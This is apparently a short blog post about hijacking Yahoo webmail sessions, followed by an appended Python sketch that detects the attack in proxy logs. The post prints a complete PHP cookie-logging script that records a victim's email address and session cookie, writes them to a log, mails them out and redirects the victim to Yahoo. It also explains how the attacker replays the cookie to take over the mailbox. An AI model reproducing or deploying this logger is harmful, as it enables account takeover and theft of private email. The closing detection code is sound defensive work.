I did a search on this new thing that they use. It had to be something on the “client side”, a bug that could be sent inside an email, a new thing, undetected by Yahoo yet. It’s easier to attack than to defend, they say.
It didn’t take me too much to find this code, which writes the recipient’s cookie (stored in C:/ under the Cookies folder) into a .log file. The hacker copy-pastes it over his own cookie that Yahoo stored on his computer and then easily accesses the victim’s Yahoo email.
The bug:
…which calls this PHP script:
$file=”cookie.log”;
if (isset($_REQUEST[”id”]) &&isset($_REQUEST[”cookie”])){
$logcookie =$_REQUEST[”cookie”];
$logcookie =rawurldecode($logcookie);
$logemail = $_REQUEST[”id”];
$logemail =rawurldecode($logemail);
if (file_exists($file)){
$handle=fopen($file,”r+”);
$filecontence=fread($handle,filesize(”$file”));
fclose($handle);
}
$handle=fopen($file, “w”);
fwrite($handle, “$logemail -$logcookie\n$filecontence\n “);
//Writing email address and cookie, then the rest of the log
fclose($handle);
mail(”email”, “$logemail”,”$logemail\n$logcookie\n$filecontence\n”);
}
header(”Location:http://mail.yahoo.com”); ?>
…which writes the cookie to the hacker’s .log file that resides on his server. A very simple example, but so deadly.
NOTE: The code is a little changed to make it hard to use without PHP knowledge.
How to protect yourself? My advice: DON’T EVER OPEN EMAILS FROM AN UNKNOWN SENDER
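The logger above leaves a recognisable trace on the network: a request to a non-Yahoo host carrying both an "id" and a "cookie" parameter, answered with a redirect to mail.yahoo.com. The following detection sketch for web proxy logs is an added example, not code from the original post; the log layout, host names and parameter values are constructed for illustration.

```python
from urllib.parse import urlsplit, parse_qs

# Constructed proxy log lines (assumed layout):
# client, method, URL, status, Location header ("-" if none)
SAMPLE_LOG = """\
10.0.0.5 GET http://example.test/s.php?id=alice%40example.test&cookie=SESSION%3Dconstructed 302 http://mail.yahoo.com
10.0.0.7 GET http://mail.yahoo.com/inbox?id=42 200 -
10.0.0.9 GET http://shop.example.test/item?id=7&cookie=accepted 200 -
10.0.0.5 POST http://example.test/s.php?cookie=SESSION%3Dother&id=bob 302 http://mail.yahoo.com/
"""

WEBMAIL_HOSTS = {"mail.yahoo.com"}  # redirect target named in the script above

def is_cookie_exfil(url, status, location):
    """True when a request matches the footprint of the logger shown above."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if host in WEBMAIL_HOSTS or host.endswith(".yahoo.com"):
        return False  # traffic to the provider itself is not exfiltration
    # Only query-string parameters are visible in this log layout.
    params = parse_qs(parts.query, keep_blank_values=True)
    if "id" not in params or "cookie" not in params:
        return False
    # The script always answers with a redirect back to the webmail site.
    if location == "-" or not status.startswith("3"):
        return False
    return (urlsplit(location).hostname or "").lower() in WEBMAIL_HOSTS

def scan(log_text):
    """Return (client, destination host) for every suspicious log line."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 5:
            continue  # skip malformed lines
        client, _method, url, status, location = fields
        if is_cookie_exfil(url, status, location):
            hits.append((client, urlsplit(url).hostname))
    return hits

if __name__ == "__main__":
    for client, host in scan(SAMPLE_LOG):
        print(f"possible cookie exfiltration: client {client} -> {host}")
```

A hit identifies the mailbox whose session should be invalidated and the destination host to block.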